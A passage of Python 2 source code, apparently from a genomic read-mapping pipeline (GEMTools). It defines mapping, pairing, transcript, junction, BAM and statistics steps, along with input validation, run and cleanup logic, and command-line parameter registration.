config.index = self.index
config.mismatches = self.genome_mismatches
config.quality_threshold = self.genome_quality_threshold
config.max_decoded_matches = self.genome_max_decoded_matches
config.min_decoded_strata = self.genome_min_decoded_strata
config.min_matched_bases = self.genome_min_matched_bases
config.max_big_indel_length = self.genome_max_big_indel_length
config.max_edit_distance = self.genome_max_edit_distance
config.mismatch_alphabet = self.genome_mismatch_alphabet
config.strata_after_best = self.genome_strata_after_best
config.trim = None
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def splitmap(self, name, configuration=None, dependencies=None, final=False, description=""):
"""Add split-mapping step"""
step = SplitMapStep(name, final=final, dependencies=dependencies, description=description, file_suffix="map")
config = dotdict()
config.index = self.index
config.mismatches = self.junction_mismatches
config.junctions_consensus = self.junctions_consensus
config.filter = self.junctions_filtering
config.refinement_step_size = self.junctions_refinement_step_size
config.min_split_size = self.junctions_min_split_size
config.matches_threshold = self.junctions_matches_threshold
config.strata_after_best = self.junctions_strata_after_best
config.mismatch_alphabet = self.genome_mismatch_alphabet
config.max_edit_distance = self.genome_max_edit_distance
config.mismatch_alphabet = self.genome_mismatch_alphabet
config.strata_after_best = self.genome_strata_after_best
config.trim = None
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def pair(self, name, configuration=None, dependencies=None, final=False, description=""):
"""Add mapping step"""
step = PairalignStep(name, dependencies=dependencies, final=final, description=description, file_suffix="map")
config = dotdict()
config.index = self.index
config.quality_threshold = self.pairing_quality_threshold
config.max_decoded_matches = self.pairing_max_decoded_matches
config.min_decoded_strata = self.pairing_min_decoded_strata
config.min_insert_size = self.pairing_min_insert_size
config.max_insert_size = self.pairing_max_insert_size
config.max_edit_distance = self.pairing_max_edit_distance
config.min_matched_bases = self.pairing_min_matched_bases
config.max_extendable_matches = self.pairing_max_extendable_matches
config.max_matches_per_extension = self.pairing_max_matches_per_extension
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def transcripts_annotation(self, name=None, configuration=None, dependencies=None, final=False, description=""):
"""Create annotation based transcriptom and map"""
if self.annotation is None:
logging.gemtools.info("No annotation specified, skipping annotation mapping")
return -1
step = TranscriptMapStep(name, dependencies=dependencies, final=final, description=description, file_suffix="map")
config = dotdict()
config.denovo = False
config.annotation = self.annotation
config.index = self.transcript_index
config.keys = self.transcript_keys
config.mismatches = self.transcript_mismatches
config.quality_threshold = self.transcript_quality_threshold
config.max_decoded_matches = self.transcript_max_decoded_matches
config.min_decoded_strata = self.transcript_min_decoded_strata
config.min_matched_bases = self.transcript_min_matched_bases
config.max_big_indel_length = self.transcript_max_big_indel_length
config.max_edit_distance = self.transcript_max_edit_distance
config.mismatch_alphabet = self.transcript_mismatch_alphabet
config.strata_after_best = self.transcript_strata_after_best
config.trim = None
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def transcripts_denovo(self, name=None, configuration=None, dependencies=None, final=False, description=""):
"""Create annotation based transcriptom and map"""
step = TranscriptMapStep(name, dependencies=dependencies, final=final, description=description, file_suffix="map")
config = dotdict()
config.denovo = True
config.index = self.denovo_index
config.keys = self.denovo_keys
config.mismatches = self.transcript_mismatches
config.quality_threshold = self.transcript_quality_threshold
config.max_decoded_matches = self.transcript_max_decoded_matches
config.min_decoded_strata = self.transcript_min_decoded_strata
config.min_matched_bases = self.transcript_min_matched_bases
config.max_big_indel_length = self.transcript_max_big_indel_length
config.max_edit_distance = self.transcript_max_edit_distance
config.mismatch_alphabet = self.transcript_mismatch_alphabet
config.strata_after_best = self.transcript_strata_after_best
config.trim = None
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def create_transcriptome(self, name, configuration=None, dependencies=None, final=False, description="Create denovo transcript index"):
step = CreateDenovoTranscriptomeStep(name, dependencies=dependencies, final=final, description=description)
config = dotdict()
config.index = self.index
config.filter = self.junctions_filtering
config.junctions_consensus = self.junctions_consensus
config.mismatches = self.junction_mismatches
config.max_junction_matches = self.junctions_max_junction_matches
config.min_split_length = self.junctions_min_intron_size
config.max_split_length = self.junctions_max_intron_size
config.strata_after_best = self.junctions_strata_after_best
config.refinement_step_size = self.junctions_refinement_step_size
config.min_split_size = self.junctions_min_split_size
config.matches_threshold = self.junctions_matches_threshold
config.coverage = self.junctions_coverage
config.annotation = self.annotation
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def extract_junctions(self, name, configuration=None, dependencies=None, final=False, description="Extract de-novo junctions"):
step = ExtractJunctionsStep(name, dependencies=dependencies, final=final, description=description)
config = dotdict()
config.index = self.index
config.annotation = self.annotation
config.filter = self.junctions_filtering
config.junctions_consensus = self.junctions_consensus
config.mismatches = self.junction_mismatches
config.max_junction_matches = self.junctions_max_junction_matches
config.min_split_length = self.junctions_min_intron_size
config.max_split_length = self.junctions_max_intron_size
config.strata_after_best = self.junctions_strata_after_best
config.refinement_step_size = self.junctions_refinement_step_size
config.min_split_size = self.junctions_min_split_size
config.matches_threshold = self.junctions_matches_threshold
config.coverage = self.junctions_coverage
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def create_stats(self, name, suffix=None, configuration=None, dependencies=None, final=False, description="Create stats"):
step = CreateStatsStep(name, dependencies=dependencies, final=final, description=description, name_suffix=suffix)
config = dotdict()
config.stats_json = self.stats_json
config.paired = not self.single_end
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def create_gtfcounts(self, name, suffix=None, configuration=None, dependencies=None, final=False, description="Create GTF gene counts and stats"):
step = CreateGtfStatsStep(name, dependencies=dependencies, final=final, description=description, name_suffix=suffix)
config = dotdict()
config.counts_weighted = self.counts_weighted
config.counts_multimaps = self.counts_multimaps
config.counts_exon_threshold = self.counts_exon_threshold
config.annotation = self.annotation
config.paired = not self.single_end
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def bam(self, name, suffix=None, configuration=None, dependencies=None, final=False, description="Create BAM file"):
step = CreateBamStep(name, dependencies=dependencies, final=final, description=description,
file_suffix="bam", name_suffix=suffix)
config = dotdict()
config.index = self.index
config.mapq = self.bam_mapq
config.calc_xs = self.calc_xs
config.sort = self.bam_sort
config.consensus = self.junctions_consensus
config.sam_no_seq_header = self.sam_no_seq_header
config.sam_compact = self.sam_compact
config.paired = not self.single_end
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def prepare_input(self, name, configuration=None, dependencies=None, final=False, description="Prepare input"):
step = PrepareInputStep(name, dependencies=dependencies, final=final, description=description)
config = dotdict()
if configuration is not None:
self.__update_dict(config, configuration)
config.paired = not self.single_end
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def index_bam(self, name, suffix=None, configuration=None, dependencies=None, final=False, description="Index BAM file"):
step = IndexBamStep(name, dependencies=dependencies, final=final, description=description, name_suffix=suffix, file_suffix="bam.bai")
config = dotdict()
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def filtered_map(self, name, configuration=None, dependencies=None, final=False, description="Create filtered .map"):
step = FilterStep(name, dependencies=dependencies, final=final, description=description)
config = dotdict()
config.annotation = self.annotation
config.min_intron = self.filter_intron_length
config.min_block = self.filter_block_length
config.level = self.filter_level
config.max_multi_maps = self.filter_max_multi_maps
config.gene_pairing = self.filter_annotation
config.junction_filter = self.filter_annotation
config.filter_annotation = self.filter_annotation
config.max_strata = self.filter_max_error_events
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def merge(self, name, configuration=None, dependencies=None, final=False, description="Merge alignments"):
step = MergeStep(name, dependencies=dependencies, final=final, description=description, file_suffix="map")
config = dotdict()
config.same_content = True
config.index = self.index
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def merge_and_pair(self, name, configuration=None, dependencies=None, final=False, description="Merge and Pair alignments"):
step = MergeAndPairStep(name, dependencies=dependencies, final=final, description=description, file_suffix="map")
config = dotdict()
config.same_content = True
config.index = self.index
config.quality_threshold = self.pairing_quality_threshold
config.max_decoded_matches = self.pairing_max_decoded_matches
config.min_decoded_strata = self.pairing_min_decoded_strata
config.min_insert_size = self.pairing_min_insert_size
config.max_insert_size = self.pairing_max_insert_size
config.max_edit_distance = self.pairing_max_edit_distance
config.min_matched_bases = self.pairing_min_matched_bases
config.max_extendable_matches = self.pairing_max_extendable_matches
config.max_matches_per_extension = self.pairing_max_matches_per_extension
if configuration is not None:
self.__update_dict(config, configuration)
step.prepare(len(self.steps), self, config)
self.steps.append(step)
return step.id
def open_input(self):
"""Open the original input files"""
if len(self.input) == 1:
return gem.files.open(self.input[0])
else:
return gem.filter.interleave([gem.files.open(f) for f in self.input], threads=max(1, self.threads / 2))
def open_step(self, id, raw=False):
"""Open the original input files"""
return self.steps[id].open(raw=raw)
def initialize(self, silent=False):
# check general parameter
errors = []
if self.input is None:
errors.append("No input file specified")
else:
if len(self.input) == 1 and not self.single_end:
# search for second file
(n, p) = gem.utils.find_pair(self.input[0])
if p is None:
#errors.append("Unable to deduce second pair input file from %s " % self.input[0])
logging.gemtools.warning("No second input file specified, assuming interleaved paird end reads!")
else:
logging.gemtools.warning("Second pair input file found: %s " % p)
if self.name is None:
self.name = n
self.input.append(p)
# check file counts
if self.single_end and len(self.input) != 1:
errors.append("Specify exactly one input file in single end mode")
elif not self.single_end and len(self.input) > 2:
errors.append("Paired end mode takes up to 2 input files, you specified %d" % (len(self.input)))
else:
# check input files
input_abs = []
for f in self.input:
if f is None or not os.path.exists(f):
errors.append("Input file not found: %s" % (f))
else:
# make aboslute path
input_abs.append(os.path.abspath(f))
self.input = input_abs
if self.name is None and self.input is not None and len(self.input) > 0:
# get name from input files
name = os.path.basename(self.input[0])
if name.endswith(".gz"):
name = name[:-3]
idx = name.rfind(".")
if idx > 0:
self.name = name[:idx]
if self.name is None or len(self.name) == 0:
errors.append("No name specified and unable to guess one. Please use --name to set a name explicitly.")
if self.index is None:
errors.append("No index specified")
else:
if not os.path.exists(self.index):
errors.append("Index not found: %s" % (self.index))
else:
self.index = os.path.abspath(self.index)
if self.quality is None:
errors.append("You have to specify a quality offset (33, 64, or 'ignore' to disable)")
elif str(self.quality) not in ["33", "64", "ignore", "offset-33", "offset-64"]:
errors.append("Unknown quality offset: %s, please use 33, 64 or ignore" % (str(self.quality)))
if self.output_dir is None:
self.output_dir = os.getcwd()
self.output_dir = os.path.abspath(self.output_dir)
if self.annotation is not None:
if not os.path.exists(self.annotation):
errors.append("Annotaiton not found : %s" % self.annotation)
else:
self.annotation = os.path.abspath(self.annotation)
if self.threads <= 0:
self.threads = 1
if self.transcript_index is None and self.annotation is not None:
# guess the transcript index
self.transcript_index = self.annotation + ".gem"
transcript_index_found = os.path.exists(self.transcript_index)
if not transcript_index_found:
self.transcript_index = self.annotation + ".junctions.gem"
transcript_index_found = os.path.exists(self.transcript_index)
if not transcript_index_found:
errors.append("Deduced transcript index not found: %s" % (self.transcript_index))
errors.append("""We look for the transcriptome index just next to your annotation, but
could not find it there. Try to specify a path to the transcriptome index using
[-r|--transcript-index] <index>, where index is the path to the transcriptome
index generated from your annotation.""")
else:
self.transcript_index = os.path.abspath(self.transcript_index)
elif self.annotation is not None and not os.path.exists(self.transcript_index):
errors.append("Transcript index not found : %s")
elif self.transcript_index is not None and os.path.exists(self.transcript_index):
self.transcript_index = os.path.abspath(self.transcript_index)
if self.transcript_keys is None and self.transcript_index is not None:
self.transcript_keys = self.transcript_index[:-4] + ".junctions.keys"
transcript_keys_found = os.path.exists(self.transcript_keys)
if not transcript_keys_found:
self.transcript_keys = self.transcript_index[:-14] + ".keys"
transcript_keys_found = os.path.exists(self.transcript_keys)
if not transcript_keys_found:
self.transcript_keys = self.transcript_index[:-4] + ".keys"
transcript_keys_found = os.path.exists(self.transcript_keys)
if not transcript_keys_found:
errors.append("Deduced transcript keys not found: %s" % (self.transcript_keys))
else:
self.transcript_keys = os.path.abspath(self.transcript_keys)
elif self.transcript_keys is not None and not os.path.exists(self.transcript_keys):
errors.append("Transcript keys not found : %s")
elif self.transcript_keys is not None and os.path.exists(self.transcript_keys):
self.transcript_keys = os.path.abspath(self.transcript_keys)
# check inpuf compression
if self.compress_all and not self.direct_input:
logging.gemtools.warning("Enabeling direct input for compressed temporay files")
self.direct_input = True
# annotaiton junctons should be generated if not found
#self.junctions_annotation = None # file with the annotation junctions
# todo : can we check for a valid scoring scheme ?
#self.scoring_scheme = "+U,+u,-s,-t,+1,-i,-a" # scoring scheme
if self.filter_min_strata >= self.filter_max_strata:
errors.append("Invalid filtering configuration, min-strata >= max-strata!")
else:
if self.filter_max_matches <= 0:
errors.append("Invalid filtering configuration, max-matches <= 0!")
else:
# compose filter
self.filter = (self.filter_min_strata, (self.filter_max_strata - self.filter_min_strata), self.filter_max_matches)
if self.bam_mapq > 254:
errors.append("Invalid mapq filter: %s" % (self.bam_mapq))
# transcript mapping parameter
if self.transcript_mismatches is None:
self.transcript_mismatches = self.genome_mismatches
if self.transcript_quality_threshold is None:
self.transcript_quality_threshold = self.genome_quality_threshold
self.transcript_min_decoded_strata = self.genome_min_decoded_strata
self.transcript_min_matched_bases = self.genome_min_matched_bases
self.transcript_max_big_indel_length = self.genome_max_big_indel_length
self.transcript_max_edit_distance = self.genome_max_edit_distance
if self.transcript_mismatch_alphabet is None:
self.transcript_mismatch_alphabet = self.genome_mismatch_alphabet
if self.transcript_strata_after_best is None:
self.transcript_strata_after_best = self.genome_strata_after_best
# pair alignment parameter
if self.pairing_quality_threshold is None:
self.pairing_quality_threshold = self.genome_quality_threshold
if self.pairing_max_insert_size is None:
self.pairing_max_insert_size = self.junctions_max_intron_size
if not self.single_end and len(errors) == 0:
# check pairing information
p1 = None
p2 = None
c = 0
inp = self.open_input()
for template in inp:
if template.num_alignments == 2:
## paired alignment
p1 = 1
p2 = 2
inp.close()
break
else:
if c == 0:
p1 = template.get_pair()
elif c == 1:
p2 = template.get_pair()
c += 1
if c >= 2:
inp.close()
break
inp.close()
if p1 == 0 or p2 == 0 or (p1 == 1 and p2 != 2) or (p2 == 1 and p1 != 2):
errors.append("""Unable to get pairing information from input.
Please check your read id's and make sure its either in casava >= 1.8 format or the
ids end with /1 and /2""")
if not silent and len(errors) > 0 and self.write_config is None:
raise PipelineError("Failed to initialize neccessary parameters:\n\n%s" % ("\n".join(errors)))
if self.write_config is not None:
# log configuration errors
logging.gemtools.warning("---------------------------------------------")
logging.gemtools.warning("Writing configuration")
logging.gemtools.warning("")
logging.gemtools.warning("Note that some of the parameters are missing:\n")
for e in errors:
logging.gemtools.warning("\t" + str(e))
logging.gemtools.warning("---------------------------------------------")
def log_parameter(self):
"""Print selected parameters"""
printer = logging.gemtools.gt
run_step = len(self.run_steps) > 0
printer("------------ Input Parameter ------------")
printer("Input File(s) : %s", self.input)
printer("Index : %s", self.index)
printer("Annotation : %s", self.annotation)
printer("Transcript Index : %s", self.transcript_index)
printer("Max read length : %s", self.max_read_length)
printer("")
printer("Compress output : %s", self.compress)
printer("Compress all : %s", self.compress_all)
printer("Create BAM : %s", self.bam_create)
printer("SAM/BAM compact : %s", self.sam_compact)
printer("Calculate XS : %s", self.calc_xs)
printer("Sort BAM : %s", self.bam_sort)
printer("Index BAM : %s", self.bam_index)
printer("Keep Temporary : %s", not self.remove_temp)
printer("")
if not run_step:
printer("------------ Pipeline Steps ------------")
for i, s in enumerate(self.steps):
printer("%-2d - %20s : %s", i, s.name, s.description)
else:
printer("------------ Single Step execution ------------")
for i, s in enumerate(self.steps):
if run_step and s.id not in self.run_steps:
continue
printer("")
if len(s.dependencies) > 0:
printer("------------ [ID:{0:-3} -- '{1}'] [Depends On: {2}] ------------".format(i, s.name, ", ".join([self.steps[j].name for j in s.dependencies])))
else:
printer("------------ [ID:{0:-3} -- '{1}'] ------------".format(i, s.name))
for k, v in s.configuration.items():
printer("%25s : %s", k, str(v))
for i, f in enumerate(s.files()):
if i == 0:
printer("%25s : %s", "Temporary Outputs", not s.final)
printer("%25s : %s", "Outputs", f)
else:
printer("%25s : %s", "", f)
printer("--------------------------------------------------------------")
printer("")
def load(self, file):
"""Load pipeline configuration from file"""
if file is None or not os.path.exists(file):
raise PipelineError("Configuration file not found: %s" % file)
fd = open(file, "r")
logging.gemtools.info("Loading configuraiton from %s", file)
data = json.load(fd)
for k, v in data.items():
if hasattr(self, k):
setattr(self, k, v)
fd.close()
def write_pipeline(self, file_name):
"""Write the pipeline and its configuration to a file
based on the name
"""
json_container = dict(self.__dict__)
# skip the steps here, we convert them manually
del json_container["steps"]
del json_container["run_steps"]
del json_container["write_config"]
# remove non default values
default_pipeline = MappingPipeline()
default_pipeline.initialize(silent=True)
for k, v in json_container.items():
if hasattr(default_pipeline, k) and getattr(default_pipeline, k) == v:
del json_container[k]
# json_container['piepline_steps'] = json_steps
fd = open(file_name, "w")
json.dump(json_container, fd, indent=2, sort_keys=True)
fd.close()
logging.gemtools.gt("Configuration saved to %s\n", file_name)
def run(self):
run_step = len(self.run_steps) > 0
if self.write_config is not None:
self.write_pipeline(self.write_config)
return
if self.dry:
# check and print states
print "Checking Job states"
print "-----------------------------------------------------"
for step in self.steps:
print "Step %3s:%25s :: %s" % (str(step.id), step.name,
"Done" if step.is_done() else "Compute")
return
error = False
all_done = True
final_files = []
# check final steps if we are not running a set of steps
if not run_step and not self.force:
for step in self.steps:
if step.final:
final_files.extend(step.files())
all_done = all_done & step.is_done()
if all_done:
logging.gemtools.warning("The following files already exist. Nothing to be run!\n\n%s\n" % ("\n".join(final_files)))
return
time = Timer()
times = {}
if run_step:
# sort by id
self.run_steps.sort()
ids = [s.id for s in self.steps]
if run_step:
ids = self.run_steps
step = None
# register signal handler to catch
# interruptions and perform cleanup
# register cleanup signal handler
def cleanup_in_signal(signal, frame):
logging.gemtools.warning("Job step canceled, forcing cleanup!")
step.cleanup(force=True)
signal.signal(signal.SIGINT, cleanup_in_signal)
signal.signal(signal.SIGQUIT, cleanup_in_signal)
signal.signal(signal.SIGHUP, cleanup_in_signal)
signal.signal(signal.SIGTERM, cleanup_in_signal)
for step_id in ids:
step = self.steps[step_id]
if run_step:
# check dependencies are done
for d in step.dependencies:
if not self.steps[d].is_done():
logging.gemtools.error("Step dependency is not completed : %s", self.steps[d].name)
error = True
break
if run_step or self.force or not step.is_done():
logging.gemtools.gt("Running step: %s" % step.name)
t = Timer()
if not os.path.exists(self.output_dir):
# make sure we create the ouput folder
logging.gemtools.warn("Creating output folder %s", self.output_dir)
try:
os.makedirs(self.output_dir)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
logging.gemtools.error("unable to create output folder %s", self.output_dir)
error = True
break
try:
step.run()
except KeyboardInterrupt:
logging.gemtools.warning("Job step canceled, forcing cleanup!")
error = True
step.cleanup(force=True)
break
except PipelineError, e:
logging.gemtools.error("Error while executing step %s : %s" % (step.name, str(e)))
logging.gemtools.warning("Cleaning up after failed step : %s", step.name)
step.cleanup(force=True)
error = True
break
except gem.utils.ProcessError, e:
logging.gemtools.error("Error while executing step %s : %s" % (step.name, str(e)))
logging.gemtools.warning("Cleaning up after failed step : %s", step.name)
step.cleanup(force=True)
error = True
break
except Exception, e:
traceback.print_exc()
logging.gemtools.error("Error while executing step %s : %s" % (step.name, str(e)))
logging.gemtools.warning("Cleaning up after failed step : %s", step.name)
step.cleanup(force=True)
error = True
break
finally:
t.stop(step.name + " completed in %s", loglevel=None)
times[step.id] = t.end
if not error:
logging.gemtools.gt("Step %s finished in : %s", step.name, t.end)
else:
logging.gemtools.gt("Step %s failed after : %s", step.name, t.end)
else:
logging.gemtools.warning("Skipping step %s, output already exists" % (step.name))
# do celanup if not in error state
if not error:
logging.gemtools.debug("Cleanup after run")
for step in self.steps:
step.cleanup()
time.stop("Completed in %s", loglevel=None)
logging.gemtools.gt("Step Times")
logging.gemtools.gt("-------------------------------------")
for s in self.steps:
if s.id in times:
logging.gemtools.gt("{0:>25} : {1}".format(s.name, times[s.id]))
else:
logging.gemtools.gt("{0:>25} : skipped".format(s.name))
logging.gemtools.gt("-------------------------------------")
logging.gemtools.gt("Pipeline run finshed in %s", time.end)
def cleanup(self):
"""Delete all remaining temporary and intermediate files
"""
pass
def create_file_name(self, suffix, name_suffix=None, file_suffix="map", final=False):
"""Create a result file name"""
file = ""
if final:
suffix = None
if name_suffix is None:
name_suffix = ""
if suffix is not None and len(suffix) > 0:
file = "%s/%s%s_%s.%s" % (self.output_dir, self.name, name_suffix, suffix, file_suffix)
else:
file = "%s/%s%s.%s" % (self.output_dir, self.name, name_suffix, file_suffix)
if (self.compress_all or final and self.compress) and file_suffix in ["map", "fastq"]:
file += ".gz"
return file
def gtf_junctions(self):
"""check if there is a .junctions file for the given annotation, if not,
create it. Returns a tuple of the set of junctions and the output file.
"""
if self.annotation is None:
return (None, None)
timer = Timer()
gtf_junctions = self.annotation + ".junctions"
out = None
junctions = None
if os.path.exists(gtf_junctions):
logging.gemtools.info("Loading existing junctions from %s" % (gtf_junctions))
out = gtf_junctions
junctions = set(gem.junctions.from_junctions(gtf_junctions))
else:
out = self.create_file_name("gtf", file_suffix="junctions")
if os.path.exists(out):
logging.gemtools.info("Loading existing junctions from %s" % (out))
junctions = set(gem.junctions.from_junctions(out))
else:
logging.gemtools.info("Extracting junctions from %s" % (self.annotation))
junctions = set(gem.junctions.from_gtf(self.annotation))
gem.junctions.write_junctions(junctions, out, self.index)
logging.gemtools.info("%d Junctions from GTF" % (len(junctions)))
timer.stop("GTF-Junctions prepared in %s")
return (junctions, out)
def register_parameter(self, parser):
"""Register all parameters with the given
arparse parser"""
self.register_general(parser)
self.register_output(parser)
self.register_filtering(parser)
self.register_counts(parser)
self.register_mapping(parser)
self.register_transcript_mapping(parser)
self.register_junctions(parser)
self.register_pairing(parser)
self.register_bam(parser)
self.register_stats(parser)
self.register_execution(parser)
def register_counts(self, parser):
"""Register all filtering parameters with given
argparse parser
parser -- the argparse parser
"""
counts_group = parser.add_argument_group('GTF gene counts and stats')
counts_group.add_argument('--no-count', dest="counts_create",
action="store_false", default=True,
help='''Do not create GTF stats and counts results''')
counts_group.add_argument('--count-no-weights', dest="counts_weighted",
action="store_false", default=True,
help='''Do not weight multimap and multi gene hits but overcount''')
counts_group.add_argument('--count-unique-only', dest="counts_multimaps",
action="store_false", default=True,
help='''Do not considere multi-maps for counting''')
counts_group.add_argument('--count-exon-threshold', dest="counts_exon_threshold",
default=1.0, type=float,
help='''Minimum overlap of a mapping with exonic region to be counted for a gene''')
def register_filtering(self, parser):
"""Register all filtering parameters with given
argparse parser
parser -- the argparse parser
"""
filtering_group = parser.add_argument_group('Filtering and Scoring')
filtering_group.add_argument('-S', '--scoring', dest="scoring_scheme", metavar="scheme", help='''The scoring scheme to use. Default %s''' % str(self.scoring_scheme))
filtering_group.add_argument('--filter-max-matches', dest="filter_max_matches", metavar="max_matches", type=int, help='''Maximum number of printed matches. Default %d''' % self.filter_max_matches)
filtering_group.add_argument('--filter-min-strata', dest="filter_min_strata", metavar="min_strata", type=int, help='''Minimum number of printed strata. Default %d''' % self.filter_min_strata)
filtering_group.add_argument('--filter-max-strata', dest="filter_max_strata", metavar="max_strata", type=int, help='''Maximum number of printed strata. Default %d''' % self.filter_max_strata)
filtering_group.add_argument('--no-filtered', dest="filtered_create",
action="store_false", default=True,
help='''Do not create filtered results''')
filtering_group.add_argument('--no-annotation-filter', dest="filter_annotation",
action="store_false", default=True,
help='''Do not filter by annotation. The annotation
filter checks that pairs and splits fall into the same gene
(assuming the gene_id is set in the annotation)''')
filtering_group.add_argument('--filter-intron-length', dest="filter_intron_length",
default=self.filter_intron_length,
help='''Filter multimaps preferring ones with intron
length > threshold''')
filtering_group.add_argument('--filter-block-length', dest="filter_block_length",
default=self.filter_block_length,
help='''Filter multimaps preferring ones with block
length > threshold''')
filtering_group.add_argument('--filter-level', dest="filter_level",
default=self.filter_level,
help='''Reduce multimaps using the specified uniqueness level.
Set this to -1 to disable''')
filtering_group.add_argument('--filter-max-multi-maps', dest="filter_max_multi_maps",
default=self.filter_max_multi_maps,
help='''Set multi-maps with more than <threshold> mappings to unmapped.
Set this to -1 to disable''')
filtering_group.add_argument('--filter-max-error-events', dest="filter_max_error_events",
default=self.filter_max_error_events,
help='''Set maps with more than <threshold> error events to unmapped.
Set this to 0 to disable''')
def register_bam(self, parser):
"""Register all bam parameters with given
argparse parser
parser -- the argparse parser
"""
bam_group = parser.add_argument_group('BAM conversion')
bam_group.add_argument('--map-quality', dest="bam_mapq", default=self.bam_mapq, type=int, help="Filter resulting bam for minimum map quality, Default %d" % self.bam_mapq)
bam_group.add_argument('--no-xs', dest="calc_xs", action="store_false", default=None, help="Do not calculate the XS field")
bam_group.add_argument('--no-bam', dest="bam_create", action="store_false", default=None, help="Do not create bam file")
bam_group.add_argument('--no-bam-sort', dest="bam_sort", action="store_false", default=None, help="Do not sort bam file")
bam_group.add_argument('--no-bam-index', dest="bam_index", action="store_false", default=None, help="Do not index the bam file")
bam_group.add_argument('--no-sequence-header', dest="sam_no_seq_header", action="store_true", default=None, help="Do not add the reference sequence header to the sam/bam file")
bam_group.add_argument('--compact', dest="sam_compact", action="store_true", default=None, help="Create sam/bam compact format where each read is represented as a single line and any multi-maps are encoded in extra fields. The selection is based on the score.")
bam_group.add_argument('--sort-memory', dest="sort_memory", default=self.sort_memory, metavar="mem", help="Memory used for samtools sort per thread. Suffix K/M/G recognized. Default %s" % (str(self.sort_memory)))
def register_general(self, parser):
"""Register all general parameters with the given
argparse parser
parser -- the argparse parser
"""
input_group = parser.add_argument_group('Input')
## general pipeline paramters
input_group.add_argument('-f', '--files', dest="input", nargs="+", metavar="input",
help='''Single fastq input file or both files for a paired-end run separated by space.
Note that if you specify only one file, we will look for the file containing the other pairs
automatically and start a paired-end run. Add the --single-end parameter to disable
pairing and file search. The file search for the second pair detects pairs
ending in [_|.|-][0|1|2].[fq|fastq|txt][.gz].''')
input_group.add_argument('--single-end', dest="single_end", action="store_true", default=None, help="Single end reads")
input_group.add_argument('-q', '--quality', dest="quality", metavar="quality",
default=self.quality, help='Quality offset. 33, 64 or "ignore" to disable qualities.')
input_group.add_argument('-i', '--index', dest="index", metavar="index", help='Path to the .gem genome index')
input_group.add_argument('--direct-input', dest="direct_input", default=None, action="store_true", help="Skip preparation step and pipe the input directly into the first mapping step")
def register_output(self, parser):
"""Register all output parameters with the given
argparse parser
parser -- the argparse parser
"""
output_group = parser.add_argument_group('Output')
output_group.add_argument('-n', '--name', dest="name", metavar="name", help="""Name used for the results. If not specified, the name is inferred from
the input files""")
output_group.add_argument('-o', '--output-dir', dest="output_dir", metavar="dir", help='Optional output folder. If not specified the current working directory is used.')
output_group.add_argument('-g', '--no-gzip', dest="compress", action="store_false", default=None, help="Do not compress final mapping file")
output_group.add_argument('--compress-all', dest="compress_all", action="store_true", default=None, help="Compress all intermediate output")
output_group.add_argument('--keep-temp', dest="remove_temp", action="store_false", default=None, help="Keep temporary files")
def register_execution(self, parser):
"""Register the execution mapping parameters with the
given arparse parser
parser -- the argparse parser
"""
execution_group = parser.add_argument_group('Execution')
execution_group.add_argument('--save', dest="write_config", nargs="?", const=None, help="Write the given configuration to disk")
execution_group.add_argument('--dry', dest="dry", action="store_true", default=None, help="Print and write configuration but do not start the pipeline")
execution_group.add_argument('--load', dest="load_configuration", default=None, metavar="cfg", help="Load pipeline configuration from file")
execution_group.add_argument('--run', dest="run_steps", type=int, default=None, nargs="+", metavar="cfg", help="Run given pipeline steps idenfified by the step id")
execution_group.add_argument('--force', dest="force", default=None, action="store_true", help="Force running all steps and skip checking for completed steps")
execution_group.add_argument('-t', '--threads', dest="threads", metavar="threads", type=int, help="Number of threads to use. Default %d" % self.threads)
def register_mapping(self, parser):
"""Register the genome mapping parameters with the
given arparse parser
parser -- the argparse parser
"""
# genome mapping parameter
mapping_group = parser.add_argument_group('General mapping parameters')
mapping_group.add_argument('-s', '--strata-after-best', dest="genome_strata_after_best", type=int, metavar="strata", help='The number of strata examined after the best one. Default %d' % (self.genome_strata_after_best))
mapping_group.add_argument('-m', '--mismatches', dest="genome_mismatches", metavar="mm", help='Set the allowed mismatch ratio as 0 < mm < 1. Default %s' % (str(self.genome_mismatches)))
mapping_group.add_argument('--quality-threshold', dest="genome_quality_threshold", type=int, metavar="qth", help='Good quality threshold. Bases with a quality score >= threshold are considered good. Default %d' % self.genome_quality_threshold)
mapping_group.add_argument('--max-decoded-matches', dest="genome_max_decoded_matches", metavar="mdm", help='Maximum decoded matches. Default %d' % (self.genome_max_decoded_matches))
mapping_group.add_argument('--min-decoded-strata', dest="genome_min_decoded_strata", metavar="mds", help='Minimum decoded strata. Default to %d' % self.genome_min_decoded_strata)
mapping_group.add_argument('--min-matched-bases', dest="genome_min_matched_bases", metavar="mmb", help='Minimum ratio of bases that must be matched. Default %d' % (self.genome_min_matched_bases))
mapping_group.add_argument('--max-edit-distance', dest="genome_max_edit_distance", metavar="med", help='Maximum edit distance (ratio) allowed for an alignment. Default %s' % (str(self.genome_max_edit_distance)))
